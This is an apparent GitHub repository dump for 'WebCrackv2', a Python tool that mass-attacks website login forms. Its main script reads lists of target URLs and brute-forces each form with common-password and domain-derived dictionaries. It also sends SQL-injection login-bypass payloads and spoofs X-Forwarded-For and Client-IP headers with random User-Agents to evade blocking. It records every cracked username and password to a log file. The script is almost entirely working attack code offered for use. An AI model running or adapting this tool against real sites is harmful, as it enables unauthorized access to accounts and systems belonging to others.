[ { "path": ".gitignore", "content": "# Byte-compiled / optimized / DLL files\n__pycache__/\n*.py[cod]\n*$py.class\n\n# C extensions\n*.so\n\n# Distribution / packaging\n.Python\nbuild/\ndevelop-eggs/\ndist/\ndownloads/\neggs/\n.eggs/\nlib/\nlib64/\nparts/\nsdist/\nvar/\nwheels/\npip-wheel-metadata/\nshare/python-wheels/\n*.egg-info/\n.installed.cfg\n*.egg\nMANIFEST\n\n# PyInstaller\n# Usually these files are written by a python script from a template\n# before PyInstaller builds the exe, so as to inject date/other infos into it.\n*.manifest\n*.spec\n\n# Installer logs\npip-log.txt\npip-delete-this-directory.txt\n\n# Unit test / coverage reports\nhtmlcov/\n.tox/\n.nox/\n.coverage\n.coverage.*\n.cache\nnosetests.xml\ncoverage.xml\n*.cover\n*.py,cover\n.hypothesis/\n.pytest_cache/\n\n# Translations\n*.mo\n*.pot\n\n# Django stuff:\n*.log\nlocal_settings.py\ndb.sqlite3\ndb.sqlite3-journal\n\n# Flask stuff:\ninstance/\n.webassets-cache\n\n# Scrapy stuff:\n.scrapy\n\n# Sphinx documentation\ndocs/_build/\n\n# PyBuilder\ntarget/\n\n# Jupyter Notebook\n.ipynb_checkpoints\n\n# IPython\nprofile_default/\nipython_config.py\n\n# pyenv\n.python-version\n\n# pipenv\n# According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.\n# However, in case of collaboration, if having platform-specific dependencies or dependencies\n# having no cross-platform support, pipenv may install dependencies that don't work, or not\n# install all needed dependencies.\n#Pipfile.lock\n\n# PEP 582; used by e.g. github.com/David-OConnor/pyflow\n__pypackages__/\n\n# Celery stuff\ncelerybeat-schedule\ncelerybeat.pid\n\n# SageMath parsed files\n*.sage.py\n\n# Environments\n.env\n.venv\nenv/\nvenv/\nENV/\nenv.bak/\nvenv.bak/\n\n# Spyder project settings\n.spyderproject\n.spyproject\n\n# Rope project settings\n.ropeproject\n\n# mkdocs documentation\n/site\n\n# mypy\n.mypy_cache/\n.dmypy.json\ndmypy.json\n\n# Pyre type checker\n.pyre/\n" }, { "path": "LICENSE", "content": "MIT License\n\nCopyright (c) 2021 水青衣\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n" }, { "path": "README.md", "content": "#WebCrackv2\n\n##计划2月末完成:\n\n基于WebCrack增加绕过图片识别码进行弱口令爆破的功能\n\n##目前已完成:\n\n1. 弱口令字典补充\n2. 万能密码字典补充\n\n##使用方法:\n\n1. 将url.txt放入同一目录下\n2. 终端输入:python3 webcrackv2.py\n3. 输入url.txt\n\n\n" }, { "path": "requirements.txt", "content": "bs4\nlxml\nrequests" }, { "path": "webcrackv2.py", "content": "'''\ntype: python3\nauthor: 水青衣\ngithub: https://github.com/wuqi5700/WebCrackv2\n'''\n\nimport datetime\nimport os\nimport random\nimport re\nimport requests\nimport time\nimport urllib\n\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\nfrom bs4 import BeautifulSoup as BS\nfrom urllib.parse import urlparse\nimport json\n\nlog_file = 'web_crack_log.txt'\noklog_file = 'web_crack_ok.txt'\n\nexp_user_dic = [\"admin' or 'a'='a\", \"'or'='or'\", \"admin' or '1'='1' or 1=1\", \"')or('a'='a\", \"'or 1=1 -- -\",\n \"' UNION Select 1,1,1 FROM admin Where ''=' \", \"-1%cf' union select 1,1,1 as password,1,1,1 %23\"]\nexp_pass_dic = exp_user_dic\n\nwith open('cms.json', 'r', encoding=\"utf-8\") as config:\n data = config.read()\n cms = json.loads(data)\n kind_num = len(cms)\n\n\ndef gettime():\n return time.strftime('%Y-%m-%d %X', time.localtime(time.time()))\n\n\ndef mix_dic(url):\n mix_user_dic = ['admin']\n mix_pass_dic = []\n static_pass_dic = ['{user}', '123456', '{user}888', '12345678', '123123', '88888888', '888888', 'password',\n '123456a',\n '{user}123', '{user}123456', '{user}666', '{user}2018', '123456789', '654321', '666666',\n '66666666', '1234567890', '8888888', '987654321', '0123456789', '12345', '1234567', '000000',\n '111111', '5201314', '123123', '123456789', 'a123456', '123456', 'a123456789', '1234567890',\n 'woaini1314', 'qq123456', 'abc123456', '123456a', '123456789a', '147258369', 'zxcvbnm',\n '987654321', '12345678910', 'abc123', 'qq123456789', '123456789.', '7708801314520', 'woaini',\n '5201314520', 'q123456', '123456abc', '1233211234567', '123123123', '123456.', '0123456789',\n 'asd123456', 'aa123456', '135792468', 'q123456789', 'abcd123456', '12345678900', 'woaini520',\n 'woaini123', 'zxcvbnm123', '1111111111111111', 'w123456', 'aini1314', 'abc123456789', '111111',\n 'woaini521', 'qwertyuiop', '1314520520', '1234567891', 'qwe123456', 'asd123', '000000',\n '1472583690', '1357924680', '789456123', '123456789abc', 'z123456', '1234567899', 'aaa123456',\n 'abcd1234', 'www123456', '123456789q', '123abc', 'qwe123', 'w123456789', '7894561230',\n '123456qq', 'zxc123456', '123456789qq', '1111111111', '111111111', '0000000000000000',\n '1234567891234567', 'qazwsxedc', 'qwerty', '123456..', 'zxc123', 'asdfghjkl', '0000000000',\n '1234554321', '123456q', '123456aa', '9876543210', '110120119', 'qaz123456', 'qq5201314',\n '123698745', '5201314', '000000000', 'as123456', '123123', '5841314520', 'z123456789',\n '52013145201314', 'a123123', 'caonima', 'a5201314', 'wang123456', 'abcd123', '123456789..',\n 'woaini1314520', '123456asd', 'aa123456789', '741852963', 'a12345678']\n mix_pass_dic = gen_dynam_dic(url)\n static_pass_dic.extend(mix_pass_dic)\n return mix_user_dic, static_pass_dic\n\n\ndef gen_dynam_dic(url):\n dynam_pass_dic = []\n tmp_dic = []\n suffix_dic = ['', '123', '888', '666', '123456']\n list1 = url.split('/')\n host = list1[2].split(\":\")[0]\n compile_ip = re.compile(\n '^(1\\d{2}|2[0-4]\\d|25[0-5]|[1-9]\\d|[1-9])\\.(1\\d{2}|2[0-4]\\d|25[0-5]|[1-9]\\d|\\d)\\.(1\\d{2}|2[0-4]\\d|25[0-5]|[1-9]\\d|\\d)\\.(1\\d{2}|2[0-4]\\d|25[0-5]|[1-9]\\d|\\d)$')\n if compile_ip.match(host):\n check_ip = 1\n else:\n check_ip = 0\n if not check_ip:\n list2 = host.split(\".\")\n i = len(list2)\n for u in range(i): # 生成url字典1\n list3 = list2[u:]\n part = '.'.join(list3)\n if (len(part) < 5):\n continue\n dynam_pass_dic.append(part)\n for u in range(i): # 生成url字典2\n list3 = list2[u]\n if len(list3) < 5:\n continue\n tmp_dic.append(list3)\n for i in tmp_dic:\n for suffix in suffix_dic:\n u = i + suffix\n dynam_pass_dic.append(u)\n return dynam_pass_dic\n else:\n return ''\n\n\ndef requests_proxies():\n proxies = {\n # 'http':'127.0.0.1:8080',\n # 'https':'127.0.0.1:8080'\n }\n return proxies\n\n\ndef random_headers(): # 生成随机headers\n user_agent = ['Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0',\n 'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.6 Safari/532.0',\n 'Mozilla/5.0 (Windows; U; Windows NT 5.1 ; x64; en-US; rv:1.9.1b2pre) Gecko/20081026 Firefox/3.1b2pre',\n 'Opera/10.60 (Windows NT 5.1; U; zh-cn) Presto/2.6.30 Version/10.60',\n 'Opera/8.01 (J2ME/MIDP; Opera Mini/2.0.4062; en; U; ssr)',\n 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14',\n 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36',\n 'Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9.2.4) Gecko/20100523 Firefox/3.6.4 ( .NET CLR 3.5.30729)',\n 'Mozilla/5.0 (Windows; U; Windows NT 6.0; fr-FR) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',\n 'Mozilla/5.0 (Windows; U; Windows NT 6.0; fr-FR) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5']\n UA = random.choice(user_agent)\n a = str(random.randint(1, 255))\n b = str(random.randint(1, 255))\n c = str(random.randint(1, 255))\n random_XFF = '127.' + a + '.' + b + '.' + c\n random_CI = '127.' + c + '.' + a + '.' + b\n headers = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'User-Agent': UA,\n 'X-Forwarded-For': random_XFF,\n 'Client-IP': random_CI,\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'zh-CN,zh;q=0.8',\n \"Referer\": \"http://www.baidu.com/\",\n 'Content-Type': 'application/x-www-form-urlencoded'}\n return headers\n\n\ndef recheck(path, data, user_name, pass_word):\n data1 = data\n conn = requests.session()\n pass_word = str(pass_word.replace('{user}', user_name))\n\n data_test = str(data1.replace('%7Buser_name%7D', 'admin'))\n data_test = str(data_test.replace('%7Bpass_word%7D', 'length_test'))\n\n data2 = str(data1.replace('%7Buser_name%7D', user_name))\n data2 = str(data2.replace('%7Bpass_word%7D', pass_word))\n res_test = conn.post(url=path, data=data_test, headers=random_headers(), timeout=20, verify=False,\n allow_redirects=True, proxies=requests_proxies()) # 预请求\n res_01 = conn.post(url=path, data=data_test, headers=random_headers(), timeout=20, verify=False,\n allow_redirects=True, proxies=requests_proxies())\n res_02 = conn.post(url=path, data=data2, headers=random_headers(), timeout=20, verify=False,\n allow_redirects=True, proxies=requests_proxies())\n res_01.encoding = res_01.apparent_encoding\n res_02.encoding = res_02.apparent_encoding\n error_length_01 = len(res_01.text + str(res_01.headers))\n error_length_02 = len(res_02.text + str(res_02.headers))\n\n if error_length_01 == error_length_02 or res_02.status_code == 403:\n return 0\n else:\n return 1\n\n\ndef get_post_path(content, url):\n form_action = str(content).split('\\n')[0]\n soup = BS(form_action, \"lxml\")\n res = urlparse(url)\n path = ''\n action_path = soup.form['action']\n\n if action_path.startswith('http'):\n path = action_path\n elif action_path.startswith('/'):\n root_path = res.scheme + '://' + res.netloc\n path = root_path + action_path\n else:\n relative_path = url.rstrip(url.split('/')[-1])\n path = relative_path + action_path\n return path\n\n\ndef get_form(url):\n url1 = url.strip()\n header = random_headers()\n res = requests.get(url1, timeout=20, verify=False, headers=header)\n res.encoding = res.apparent_encoding\n html = res.text\n cms_id = get_cms_kind(html)\n all_soup = BS(html, \"lxml\")\n captchas = ['验证码', '验 证 码', '点击更换', '点击刷新', '看不清', '认证码', '安全问题']\n if cms_id and cms[cms_id]['captcha'] == 1:\n print(\"[-] captcha in login page: \" + url + '\\n', gettime())\n with open(log_file, 'a+') as log:\n log.write(\"[-] captcha in login page: \" + url + '\\n')\n return '', '', ''\n else:\n if not cms_id:\n for captcha in captchas:\n if captcha in html:\n print(\"[-]\" + captcha + \" in login page: \" + url + '\\n', gettime())\n with open(log_file, 'a+') as log:\n log.write(\"[-]\" + captcha + \" in login page: \" + url + '\\n')\n return '', '', ''\n try:\n title = all_soup.title.text\n except:\n title = ''\n result = re.findall(\".*
.*\", html, re.S)\n form_data = ''\n form_content = ''\n if result:\n form_data = ''\n\n form_soup = BS(form_data, \"lxml\")\n\n form_content = form_soup.form\n\n return form_content, title, cms_id\n\n\ndef get_data(url, content):\n data = {}\n captcha = 0\n user_key = ''\n pass_key = ''\n for x in content.find_all('input'):\n ok_flag = 0\n if x.has_attr('name'):\n parameter = x['name']\n elif x.has_attr('id'):\n parameter = x['id']\n else:\n parameter = ''\n if x.has_attr('value'):\n value = x['value']\n else:\n value = '0000'\n if parameter:\n if not user_key:\n for z in ['user', 'name', 'zhanghao', 'yonghu', 'email', 'account']:\n if z in parameter.lower():\n value = '{user_name}'\n user_key = parameter\n ok_flag = 1\n break\n if not ok_flag:\n for y in ['pass', 'pw', 'mima']:\n if y in parameter.lower():\n value = '{pass_word}'\n pass_key = parameter\n ok_flag = 1\n break\n data[parameter] = str(value)\n\n for i in ['reset']:\n for r in list(data.keys()):\n if i in r.lower():\n data.pop(r)\n if user_key and pass_key:\n return user_key, pass_key, str(urllib.parse.urlencode(data))\n else:\n return False, False, False\n\n\ndef get_error_length(conn, path, data):\n data1 = data\n dynamic_req_len = 0\n data2 = str(data1.replace('%7Buser_name%7D', 'admin'))\n data2 = str(data2.replace('%7Bpass_word%7D', 'length_test'))\n res_test = conn.post(url=path, data=data2, headers=random_headers(), timeout=20, verify=False,\n allow_redirects=True, proxies=requests_proxies()) # 先请求一次\n res_02 = conn.post(url=path, data=data2, headers=random_headers(), timeout=20, verify=False,\n allow_redirects=True, proxies=requests_proxies())\n res_02.encoding = res_02.apparent_encoding\n res = conn.post(url=path, data=data2, headers=random_headers(), timeout=20, verify=False, allow_redirects=True,\n proxies=requests_proxies())\n res.encoding = res.apparent_encoding\n error_length_02 = len(res_02.text + str(res_02.headers))\n error_length = len(res.text + str(res.headers))\n if error_length_02 != error_length:\n dynamic_req_len = 1\n return error_length, dynamic_req_len\n\n\ndef confirm_login_page(url):\n form_content, title, cms_id = get_form(url)\n search_flag = ['检索', '搜', 'search', '查找', 'keyword', '关键字']\n for i in search_flag:\n if i in form_content:\n print(\"[-] Maybe search pages:\", url)\n with open(log_file, 'a+') as log:\n log.write(\"[-] Maybe search pages:\" + url + '\\n')\n form_content = ''\n\n logins = ['用户名', '密码', 'login', 'denglu', '登录', 'user', 'pass', 'yonghu', 'mima']\n login_flag = 0\n if form_content:\n for login in logins:\n if login in str(form_content):\n login_flag = 1\n break\n if login_flag == 0:\n print(\"[-] Maybe not login pages:\", url)\n with open(log_file, 'a+') as log:\n log.write(\"[-] Maybe not login pages:\" + url + '\\n')\n form_content = ''\n return form_content, cms_id\n\n\ndef get_cms_kind(html):\n for cms_id in range(kind_num):\n keyword = cms[cms_id]['keywords']\n if keyword and keyword in html:\n print(\"识别到cms:\", cms[cms_id]['name'])\n if cms[cms_id]['alert']:\n print(cms[cms_id]['note'])\n return cms_id\n # print(\"未识别出当前所使用cms\")\n return 0\n\n\ndef web_crack_task(url):\n try:\n form_content, cms_id = confirm_login_page(url)\n if cms_id:\n exp_able = cms[cms_id]['exp_able']\n else:\n exp_able = 1\n if form_content:\n user_key, pass_key, data = get_data(url, form_content)\n if data:\n print(\"Checking :\", url, gettime())\n path = get_post_path(form_content, url)\n user_dic, pass_dic = mix_dic(url)\n user_name, pass_word = crack_task(path, data, user_dic, pass_dic, user_key, pass_key, cms_id)\n recheck_flag = 1\n if user_name:\n print(\"Rechecking...\", url, user_name, pass_word)\n recheck_flag = recheck(path, data, user_name, pass_word)\n else:\n if exp_able:\n user_dic = exp_user_dic\n pass_dic = exp_pass_dic\n print('启动万能密码爆破模块')\n user_name, pass_word = crack_task(path, data, user_dic, pass_dic, user_key, pass_key, cms_id)\n if user_name:\n print(\"Rechecking......\", url, user_name, pass_word)\n recheck_flag = recheck(path, data, user_name, pass_word)\n else:\n recheck_flag = 0\n else:\n recheck_flag = 0\n\n if recheck_flag:\n with open(log_file, 'a+') as log:\n log.write(\"[+] Success :\" + url + ' ' + user_name + '/' + pass_word + '\\n')\n with open(oklog_file, 'a+') as oklog:\n oklog.write(url + ' ' + user_name + '/' + pass_word + '\\n')\n print(\"[+] Success :\", url, \" user/pass\", user_name + '/' + pass_word)\n else:\n print(\"[-] Faild :\", url, gettime())\n with open(log_file, 'a+') as log:\n log.write(\"[-] Faild :\" + url + '\\n')\n except Exception as e:\n start = datetime.datetime.now()\n with open('web_crack_error.txt', 'a+') as error_log:\n error_log.write(str(start) + str(e) + '\\n')\n print(start, e)\n\n\ndef crack_task(path, data, user_dic, pass_dic, user_key, pass_key, cms_id):\n try:\n conn = requests.session()\n error_length, dynamic_req_len = get_error_length(conn, path, data)\n if dynamic_req_len:\n return False, False\n num = 0\n success_flag = 0\n dic_all = len(user_dic) * len(pass_dic)\n if not dic_all:\n return False, False\n fail_words = ['密码错误', '重试', '不正确', '密码有误', '不成功', '重新输入', '不存在', '登录失败', '登陆失败', '密码或安全问题错误', 'history.go',\n 'history.back',\n '已被锁定', '安全拦截', '还可以尝试', '无效', '攻击行为', '创宇盾',\n 'http://zhuji.360.cn/guard/firewall/stopattack.html', 'D盾_拦截提示', '用户不存在',\n '非法', '百度云加速', '安全威胁', '防火墙', '黑客', '不合法', 'Denied', '尝试次数',\n 'http://safe.webscan.360.cn/stopattack.html']\n for user_name in user_dic:\n for pass_word in pass_dic:\n right_pass = 1\n data1 = data\n pass_word = pass_word.replace('{user}', user_name)\n data2 = data1.replace('%7Buser_name%7D', urllib.parse.quote(user_name))\n data2 = data2.replace('%7Bpass_word%7D', urllib.parse.quote(pass_word))\n num = num + 1\n # print('URL: ',path,\"字典总数:\", dic_all, \" 当前尝试:\", num, \" checking:\", user_name, pass_word)\n print(\"字典总数:\", dic_all, \" 当前尝试:\", num, \" checking:\", user_name, pass_word)\n res = conn.post(url=path, data=data2, headers=random_headers(), timeout=20, verify=False,\n allow_redirects=True, proxies=requests_proxies())\n # time.sleep(0.5)\n res.encoding = res.apparent_encoding\n html = res.text + str(res.headers)\n if cms_id and cms[cms_id]['success_flag']:\n if cms[cms_id]['success_flag'] in html:\n success_flag = 1\n return user_name, pass_word\n elif cms_id and cms[cms_id]['fail_flag']:\n if cms[cms_id]['fail_flag'] in html:\n return False, False\n else:\n continue\n else:\n for i in fail_words:\n if i in html:\n right_pass = 0\n break\n if right_pass:\n cur_length = len(res.text + str(res.headers))\n if user_key:\n if user_key in res.text:\n continue\n elif pass_key:\n if pass_key in res.text:\n continue\n if cur_length != error_length:\n success_flag = 1\n return user_name, pass_word\n else:\n continue\n if success_flag == 0:\n return False, False\n except Exception as e:\n start = datetime.datetime.now()\n with open('web_crack_error.txt', 'a+') as error_log:\n error_log.write(str(start) + str(e) + '\\n')\n print(start, e)\n\n\nif __name__ == \"__main__\":\n print(author_info)\n url_file_name = input('File or Url:\\n')\n now = gettime()\n try:\n if '://' in url_file_name:\n web_crack_task(url_file_name)\n else:\n url_list = []\n if os.path.exists(url_file_name):\n print(url_file_name, \"exists!\\n\")\n with open(url_file_name, 'r') as url_file:\n for url in url_file.readlines():\n url = url.strip()\n if url.startswith('#') or url == '' or ('.edu.cn' in url) or ('.gov.cn' in url):\n continue\n url_list.append(url)\n url_all = len(url_list)\n cur_num = 0\n print(\"总任务数:\", url_all)\n for url in url_list:\n print(\"\\n\" + \"[\" + str(cur_num + 1) + \"/\" + str(url_all) + \"]\", \" url:\", url_list[cur_num])\n web_crack_task(url)\n cur_num += 1\n else:\n print(url_file_name + \" not exist!\")\n exit(0)\n except Exception as e:\n start = datetime.datetime.now()\n with open('web_crack_error.txt', 'a+') as error_log:\n error_log.write(str(start) + str(e) + '\\n')\n print(start, e)\n" } ]